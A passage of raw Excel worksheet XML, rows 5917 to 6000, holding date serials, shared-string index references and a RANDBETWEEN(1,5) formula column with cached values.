      <c r="C5917" t="s">
        <v>10</v>
      </c>
      <c r="D5917" t="s">
        <v>6</v>
      </c>
      <c r="F5917">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5918" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5918" s="1">
        <v>43445.977071759262</v>
      </c>
      <c r="C5918" t="s">
        <v>43</v>
      </c>
      <c r="D5918" t="s">
        <v>713</v>
      </c>
      <c r="E5918" t="s">
        <v>5362</v>
      </c>
      <c r="F5918">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5919" s="1">
        <v>43445.882824074077</v>
      </c>
      <c r="C5919" t="s">
        <v>314</v>
      </c>
      <c r="D5919" t="s">
        <v>312</v>
      </c>
      <c r="E5919" t="s">
        <v>5403</v>
      </c>
      <c r="F5919">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5920" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A5920" s="1">
        <v>43445.844166666669</v>
      </c>
      <c r="C5920" t="s">
        <v>189</v>
      </c>
      <c r="E5920" s="2" t="s">
        <v>5404</v>
      </c>
      <c r="F5920">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5921" s="1">
        <v>43445.815671296295</v>
      </c>
      <c r="C5921" t="s">
        <v>10</v>
      </c>
      <c r="D5921" t="s">
        <v>20</v>
      </c>
      <c r="E5921" t="s">
        <v>5405</v>
      </c>
      <c r="F5921">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5922" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A5922" s="1">
        <v>43445.812858796293</v>
      </c>
      <c r="C5922" t="s">
        <v>10</v>
      </c>
      <c r="D5922" t="s">
        <v>6</v>
      </c>
      <c r="E5922" s="2" t="s">
        <v>5406</v>
      </c>
      <c r="F5922">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5923" s="1">
        <v>43445.795451388891</v>
      </c>
      <c r="C5923" t="s">
        <v>10</v>
      </c>
      <c r="D5923" t="s">
        <v>6</v>
      </c>
      <c r="E5923" t="s">
        <v>3948</v>
      </c>
      <c r="F5923">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5924" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A5924" s="1">
        <v>43445.774918981479</v>
      </c>
      <c r="C5924" t="s">
        <v>10</v>
      </c>
      <c r="D5924" t="s">
        <v>94</v>
      </c>
      <c r="E5924" s="2" t="s">
        <v>5407</v>
      </c>
      <c r="F5924">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5925" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A5925" s="1">
        <v>43445.774861111109</v>
      </c>
      <c r="C5925" t="s">
        <v>10</v>
      </c>
      <c r="D5925" t="s">
        <v>94</v>
      </c>
      <c r="E5925" s="2" t="s">
        <v>5407</v>
      </c>
      <c r="F5925">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5926" s="1">
        <v>43445.772141203706</v>
      </c>
      <c r="C5926" t="s">
        <v>10</v>
      </c>
      <c r="D5926" t="s">
        <v>94</v>
      </c>
      <c r="E5926" t="s">
        <v>5408</v>
      </c>
      <c r="F5926">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5927" s="1">
        <v>43445.75037037037</v>
      </c>
      <c r="C5927" t="s">
        <v>10</v>
      </c>
      <c r="D5927" t="s">
        <v>381</v>
      </c>
      <c r="E5927" t="s">
        <v>5409</v>
      </c>
      <c r="F5927">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5928" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A5928" s="1">
        <v>43445.74046296296</v>
      </c>
      <c r="C5928" t="s">
        <v>10</v>
      </c>
      <c r="D5928" t="s">
        <v>33</v>
      </c>
      <c r="E5928" s="2" t="s">
        <v>5410</v>
      </c>
      <c r="F5928">
        <f t="shared" ca="1" si="92"/>
        <v>1</v>
      </c>
    </row>
    <row r="5929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5929" s="1">
        <v>43445.731793981482</v>
      </c>
      <c r="C5929" t="s">
        <v>10</v>
      </c>
      <c r="D5929" t="s">
        <v>33</v>
      </c>
      <c r="F5929">
        <f t="shared" ca="1" si="92"/>
        <v>1</v>
      </c>
    </row>
    <row r="5930" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A5930" s="1">
        <v>43445.73028935185</v>
      </c>
      <c r="C5930" t="s">
        <v>10</v>
      </c>
      <c r="D5930" t="s">
        <v>46</v>
      </c>
      <c r="E5930" s="2" t="s">
        <v>5411</v>
      </c>
      <c r="F5930">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5931" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5931" s="1">
        <v>43445.722395833334</v>
      </c>
      <c r="C5931" t="s">
        <v>10</v>
      </c>
      <c r="D5931" t="s">
        <v>94</v>
      </c>
      <c r="E5931" t="s">
        <v>5412</v>
      </c>
      <c r="F5931">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5932" s="1">
        <v>43445.72042824074</v>
      </c>
      <c r="C5932" t="s">
        <v>10</v>
      </c>
      <c r="E5932" t="s">
        <v>5413</v>
      </c>
      <c r="F5932">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5933" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A5933" s="1">
        <v>43445.714236111111</v>
      </c>
      <c r="C5933" t="s">
        <v>260</v>
      </c>
      <c r="E5933" s="2" t="s">
        <v>5414</v>
      </c>
      <c r="F5933">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5934" s="1">
        <v>43445.68509259259</v>
      </c>
      <c r="C5934" t="s">
        <v>10</v>
      </c>
      <c r="D5934" t="s">
        <v>89</v>
      </c>
      <c r="E5934" t="s">
        <v>5415</v>
      </c>
      <c r="F5934">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5935" s="1">
        <v>43445.682835648149</v>
      </c>
      <c r="C5935" t="s">
        <v>10</v>
      </c>
      <c r="D5935" t="s">
        <v>36</v>
      </c>
      <c r="E5935" t="s">
        <v>5416</v>
      </c>
      <c r="F5935">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5936" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5936" s="1">
        <v>43445.665231481478</v>
      </c>
      <c r="C5936" t="s">
        <v>60</v>
      </c>
      <c r="E5936" t="s">
        <v>5417</v>
      </c>
      <c r="F5936">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5937" s="1">
        <v>43445.664351851854</v>
      </c>
      <c r="C5937" t="s">
        <v>60</v>
      </c>
      <c r="E5937" t="s">
        <v>5165</v>
      </c>
      <c r="F5937">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5938" s="1">
        <v>43445.664004629631</v>
      </c>
      <c r="C5938" t="s">
        <v>60</v>
      </c>
      <c r="E5938" t="s">
        <v>5418</v>
      </c>
      <c r="F5938">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5939" s="1">
        <v>43445.660844907405</v>
      </c>
      <c r="C5939" t="s">
        <v>60</v>
      </c>
      <c r="F5939">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5940" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5940" s="1">
        <v>43445.658946759257</v>
      </c>
      <c r="C5940" t="s">
        <v>10</v>
      </c>
      <c r="D5940" t="s">
        <v>46</v>
      </c>
      <c r="E5940" t="s">
        <v>5419</v>
      </c>
      <c r="F5940">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5941" s="1">
        <v>43445.623680555553</v>
      </c>
      <c r="C5941" t="s">
        <v>10</v>
      </c>
      <c r="D5941" t="s">
        <v>112</v>
      </c>
      <c r="E5941" t="s">
        <v>5420</v>
      </c>
      <c r="F5941">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5942" s="1">
        <v>43445.616377314815</v>
      </c>
      <c r="C5942" t="s">
        <v>16</v>
      </c>
      <c r="F5942">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5943" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A5943" s="1">
        <v>43445.613437499997</v>
      </c>
      <c r="C5943" t="s">
        <v>10</v>
      </c>
      <c r="D5943" t="s">
        <v>80</v>
      </c>
      <c r="E5943" s="2" t="s">
        <v>5421</v>
      </c>
      <c r="F5943">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5944" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5944" s="1">
        <v>43445.603750000002</v>
      </c>
      <c r="C5944" t="s">
        <v>10</v>
      </c>
      <c r="D5944" t="s">
        <v>6</v>
      </c>
      <c r="E5944" t="s">
        <v>5422</v>
      </c>
      <c r="F5944">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5945" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A5945" s="1">
        <v>43445.575115740743</v>
      </c>
      <c r="C5945" t="s">
        <v>6</v>
      </c>
      <c r="D5945" t="s">
        <v>114</v>
      </c>
      <c r="E5945" s="2" t="s">
        <v>5423</v>
      </c>
      <c r="F5945">
        <f t="shared" ca="1" si="92"/>
        <v>1</v>
      </c>
    </row>
    <row r="5946" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5946" s="1">
        <v>43445.568194444444</v>
      </c>
      <c r="C5946" t="s">
        <v>10</v>
      </c>
      <c r="D5946" t="s">
        <v>52</v>
      </c>
      <c r="E5946" t="s">
        <v>5424</v>
      </c>
      <c r="F5946">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5947" s="1">
        <v>43445.559803240743</v>
      </c>
      <c r="C5947" t="s">
        <v>10</v>
      </c>
      <c r="D5947" t="s">
        <v>6</v>
      </c>
      <c r="E5947" t="s">
        <v>5425</v>
      </c>
      <c r="F5947">
        <f t="shared" ca="1" si="92"/>
        <v>5</v>
      </c>
    </row>
    <row r="5948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5948" s="1">
        <v>43445.558263888888</v>
      </c>
      <c r="C5948" t="s">
        <v>724</v>
      </c>
      <c r="E5948" t="s">
        <v>5426</v>
      </c>
      <c r="F5948">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5949" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5949" s="1">
        <v>43445.541851851849</v>
      </c>
      <c r="C5949" t="s">
        <v>10</v>
      </c>
      <c r="D5949" t="s">
        <v>6</v>
      </c>
      <c r="E5949" t="s">
        <v>5427</v>
      </c>
      <c r="F5949">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5950" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5950" s="1">
        <v>43445.484849537039</v>
      </c>
      <c r="C5950" t="s">
        <v>6</v>
      </c>
      <c r="D5950" t="s">
        <v>194</v>
      </c>
      <c r="E5950" t="s">
        <v>5428</v>
      </c>
      <c r="F5950">
        <f t="shared" ca="1" si="92"/>
        <v>3</v>
      </c>
    </row>
    <row r="5951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5951" s="1">
        <v>43445.460787037038</v>
      </c>
      <c r="C5951" t="s">
        <v>10</v>
      </c>
      <c r="D5951" t="s">
        <v>86</v>
      </c>
      <c r="E5951" t="s">
        <v>5429</v>
      </c>
      <c r="F5951">
        <f t="shared" ca="1" si="92"/>
        <v>4</v>
      </c>
    </row>
    <row r="5952" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5952" s="1">
        <v>43445.449143518519</v>
      </c>
      <c r="C5952" t="s">
        <v>10</v>
      </c>
      <c r="D5952" t="s">
        <v>993</v>
      </c>
      <c r="E5952" t="s">
        <v>5430</v>
      </c>
      <c r="F5952">
        <f t="shared" ca="1" si="92"/>
        <v>1</v>
      </c>
    </row>
    <row r="5953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5953" s="1">
        <v>43445.438622685186</v>
      </c>
      <c r="C5953" t="s">
        <v>124</v>
      </c>
      <c r="E5953" t="s">
        <v>5431</v>
      </c>
      <c r="F5953">
        <f t="shared" ca="1" si="92"/>
        <v>2</v>
      </c>
    </row>
    <row r="5954" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5954" s="1">
        <v>43445.434317129628</v>
      </c>
      <c r="C5954" t="s">
        <v>10</v>
      </c>
      <c r="D5954" t="s">
        <v>192</v>
      </c>
      <c r="E5954" t="s">
        <v>5432</v>
      </c>
      <c r="F5954">
        <f t="shared" ref="F5954:F6017" ca="1" si="93">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5955" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5955" s="1">
        <v>43445.432199074072</v>
      </c>
      <c r="C5955" t="s">
        <v>10</v>
      </c>
      <c r="D5955" t="s">
        <v>271</v>
      </c>
      <c r="E5955" t="s">
        <v>5433</v>
      </c>
      <c r="F5955">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="5956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5956" s="1">
        <v>43445.427511574075</v>
      </c>
      <c r="C5956" t="s">
        <v>10</v>
      </c>
      <c r="D5956" t="s">
        <v>229</v>
      </c>
      <c r="E5956" t="s">
        <v>5434</v>
      </c>
      <c r="F5956">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5957" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5957" s="1">
        <v>43445.426516203705</v>
      </c>
      <c r="C5957" t="s">
        <v>10</v>
      </c>
      <c r="D5957" t="s">
        <v>494</v>
      </c>
      <c r="E5957" t="s">
        <v>5435</v>
      </c>
      <c r="F5957">
        <f t="shared" ca="1" si="93"/>
        <v>2</v>
      </c>
    </row>
    <row r="5958" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5958" s="1">
        <v>43445.404976851853</v>
      </c>
      <c r="C5958" t="s">
        <v>10</v>
      </c>
      <c r="D5958" t="s">
        <v>23</v>
      </c>
      <c r="E5958" s="2" t="s">
        <v>5436</v>
      </c>
      <c r="F5958">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5959" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5959" s="1">
        <v>43445.394201388888</v>
      </c>
      <c r="C5959" t="s">
        <v>10</v>
      </c>
      <c r="D5959" t="s">
        <v>17</v>
      </c>
      <c r="E5959" t="s">
        <v>5437</v>
      </c>
      <c r="F5959">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5960" s="1">
        <v>43445.389027777775</v>
      </c>
      <c r="C5960" t="s">
        <v>65</v>
      </c>
      <c r="E5960" t="s">
        <v>5438</v>
      </c>
      <c r="F5960">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="5961" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A5961" s="1">
        <v>43445.379328703704</v>
      </c>
      <c r="C5961" t="s">
        <v>10</v>
      </c>
      <c r="D5961" t="s">
        <v>232</v>
      </c>
      <c r="E5961" s="2" t="s">
        <v>5439</v>
      </c>
      <c r="F5961">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5962" s="1">
        <v>43445.369930555556</v>
      </c>
      <c r="C5962" t="s">
        <v>10</v>
      </c>
      <c r="D5962" t="s">
        <v>20</v>
      </c>
      <c r="E5962" t="s">
        <v>5440</v>
      </c>
      <c r="F5962">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="5963" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5963" s="1">
        <v>43445.360856481479</v>
      </c>
      <c r="C5963" t="s">
        <v>41</v>
      </c>
      <c r="E5963" t="s">
        <v>5441</v>
      </c>
      <c r="F5963">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="5964" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A5964" s="1">
        <v>43445.347418981481</v>
      </c>
      <c r="C5964" t="s">
        <v>10</v>
      </c>
      <c r="D5964" t="s">
        <v>52</v>
      </c>
      <c r="E5964" s="2" t="s">
        <v>5442</v>
      </c>
      <c r="F5964">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="5965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5965" s="1">
        <v>43445.283182870371</v>
      </c>
      <c r="C5965" t="s">
        <v>97</v>
      </c>
      <c r="E5965" t="s">
        <v>5443</v>
      </c>
      <c r="F5965">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5966" s="1">
        <v>43445.255937499998</v>
      </c>
      <c r="C5966" t="s">
        <v>41</v>
      </c>
      <c r="F5966">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5967" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A5967" s="1">
        <v>43445.239201388889</v>
      </c>
      <c r="C5967" t="s">
        <v>339</v>
      </c>
      <c r="E5967" s="2" t="s">
        <v>5444</v>
      </c>
      <c r="F5967">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5968" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A5968" s="1">
        <v>43445.230509259258</v>
      </c>
      <c r="C5968" t="s">
        <v>71</v>
      </c>
      <c r="E5968" s="2" t="s">
        <v>5445</v>
      </c>
      <c r="F5968">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5969" s="1">
        <v>43445.189837962964</v>
      </c>
      <c r="C5969" t="s">
        <v>10</v>
      </c>
      <c r="D5969" t="s">
        <v>6</v>
      </c>
      <c r="E5969" t="s">
        <v>776</v>
      </c>
      <c r="F5969">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5970" s="1">
        <v>43445.189756944441</v>
      </c>
      <c r="C5970" t="s">
        <v>10</v>
      </c>
      <c r="D5970" t="s">
        <v>6</v>
      </c>
      <c r="E5970" t="s">
        <v>776</v>
      </c>
      <c r="F5970">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="5971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5971" s="1">
        <v>43445.188449074078</v>
      </c>
      <c r="C5971" t="s">
        <v>2082</v>
      </c>
      <c r="F5971">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5972" s="1">
        <v>43445.174988425926</v>
      </c>
      <c r="C5972" t="s">
        <v>2082</v>
      </c>
      <c r="F5972">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5973" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5973" s="1">
        <v>43445.173877314817</v>
      </c>
      <c r="C5973" t="s">
        <v>1414</v>
      </c>
      <c r="E5973" t="s">
        <v>5068</v>
      </c>
      <c r="F5973">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="5974" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5974" s="1">
        <v>43445.167118055557</v>
      </c>
      <c r="C5974" t="s">
        <v>2082</v>
      </c>
      <c r="F5974">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5975" s="1">
        <v>43445.159733796296</v>
      </c>
      <c r="C5975" t="s">
        <v>2082</v>
      </c>
      <c r="F5975">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5976" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5976" s="1">
        <v>43445.154907407406</v>
      </c>
      <c r="C5976" t="s">
        <v>226</v>
      </c>
      <c r="E5976" t="s">
        <v>5068</v>
      </c>
      <c r="F5976">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="5977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5977" s="1">
        <v>43445.154872685183</v>
      </c>
      <c r="C5977" t="s">
        <v>226</v>
      </c>
      <c r="E5977" t="s">
        <v>5068</v>
      </c>
      <c r="F5977">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="5978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5978" s="1">
        <v>43445.141400462962</v>
      </c>
      <c r="C5978" t="s">
        <v>333</v>
      </c>
      <c r="E5978" t="s">
        <v>5446</v>
      </c>
      <c r="F5978">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5979" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A5979" s="1">
        <v>43445.140949074077</v>
      </c>
      <c r="C5979" t="s">
        <v>173</v>
      </c>
      <c r="E5979" s="2" t="s">
        <v>5447</v>
      </c>
      <c r="F5979">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="5980" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5980" s="1">
        <v>43445.135324074072</v>
      </c>
      <c r="C5980" t="s">
        <v>92</v>
      </c>
      <c r="E5980">
        <v>123</v>
      </c>
      <c r="F5980">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="5981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5981" s="1">
        <v>43445.133773148147</v>
      </c>
      <c r="C5981" t="s">
        <v>253</v>
      </c>
      <c r="E5981" t="s">
        <v>4673</v>
      </c>
      <c r="F5981">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="5982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5982" s="1">
        <v>43445.133564814816</v>
      </c>
      <c r="C5982" t="s">
        <v>2082</v>
      </c>
      <c r="F5982">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="5983" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A5983" s="1">
        <v>43445.130312499998</v>
      </c>
      <c r="C5983" t="s">
        <v>301</v>
      </c>
      <c r="E5983" s="2" t="s">
        <v>5448</v>
      </c>
      <c r="F5983">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="5984" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5984" s="1">
        <v>43445.130324074074</v>
      </c>
      <c r="C5984" t="s">
        <v>1130</v>
      </c>
      <c r="E5984">
        <v>123</v>
      </c>
      <c r="F5984">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5985" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5985" s="1">
        <v>43445.125914351855</v>
      </c>
      <c r="C5985" t="s">
        <v>2082</v>
      </c>
      <c r="F5985">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5986" s="1">
        <v>43445.120775462965</v>
      </c>
      <c r="C5986" t="s">
        <v>1130</v>
      </c>
      <c r="E5986" t="s">
        <v>5068</v>
      </c>
      <c r="F5986">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="5987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5987" s="1">
        <v>43445.09814814815</v>
      </c>
      <c r="C5987" t="s">
        <v>226</v>
      </c>
      <c r="E5987" t="s">
        <v>5068</v>
      </c>
      <c r="F5987">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5988" s="1">
        <v>43445.09679398148</v>
      </c>
      <c r="C5988" t="s">
        <v>10</v>
      </c>
      <c r="D5988" t="s">
        <v>6</v>
      </c>
      <c r="E5988" t="s">
        <v>5243</v>
      </c>
      <c r="F5988">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5989" s="1">
        <v>43445.095381944448</v>
      </c>
      <c r="C5989" t="s">
        <v>2082</v>
      </c>
      <c r="F5989">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5990" s="1">
        <v>43445.093090277776</v>
      </c>
      <c r="C5990" t="s">
        <v>226</v>
      </c>
      <c r="E5990" t="s">
        <v>5068</v>
      </c>
      <c r="F5990">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5991" s="1">
        <v>43445.093043981484</v>
      </c>
      <c r="C5991" t="s">
        <v>226</v>
      </c>
      <c r="E5991" t="s">
        <v>5068</v>
      </c>
      <c r="F5991">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="5992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5992" s="1">
        <v>43445.091087962966</v>
      </c>
      <c r="C5992" t="s">
        <v>226</v>
      </c>
      <c r="F5992">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="5993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5993" s="1">
        <v>43445.091053240743</v>
      </c>
      <c r="C5993" t="s">
        <v>226</v>
      </c>
      <c r="F5993">
        <f t="shared" ca="1" si="93"/>
        <v>2</v>
      </c>
    </row>
    <row r="5994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5994" s="1">
        <v>43445.08053240741</v>
      </c>
      <c r="C5994" t="s">
        <v>2082</v>
      </c>
      <c r="F5994">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5995" s="1">
        <v>43445.069571759261</v>
      </c>
      <c r="C5995" t="s">
        <v>1325</v>
      </c>
      <c r="D5995" t="s">
        <v>222</v>
      </c>
      <c r="E5995" t="s">
        <v>5449</v>
      </c>
      <c r="F5995">
        <f t="shared" ca="1" si="93"/>
        <v>2</v>
      </c>
    </row>
    <row r="5996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5996" s="1">
        <v>43445.064525462964</v>
      </c>
      <c r="C5996" t="s">
        <v>41</v>
      </c>
      <c r="E5996" t="s">
        <v>5450</v>
      </c>
      <c r="F5996">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="5997" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5997" s="1">
        <v>43445.061979166669</v>
      </c>
      <c r="C5997" t="s">
        <v>173</v>
      </c>
      <c r="F5997">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="5998" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5998" s="1">
        <v>43445.055543981478</v>
      </c>
      <c r="C5998" t="s">
        <v>226</v>
      </c>
      <c r="E5998" t="s">
        <v>5068</v>
      </c>
      <c r="F5998">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="5999" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5999" s="1">
        <v>43445.051180555558</v>
      </c>
      <c r="C5999" t="s">
        <v>226</v>
      </c>
      <c r="E5999" t="s">
        <v>5068</v>
      </c>
      <c r="F5999">
        <f t="shared" ca="1" si="93"/>
        <v>4</v>
      </c>
    </row>
    <row r="6000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6000" s="1">
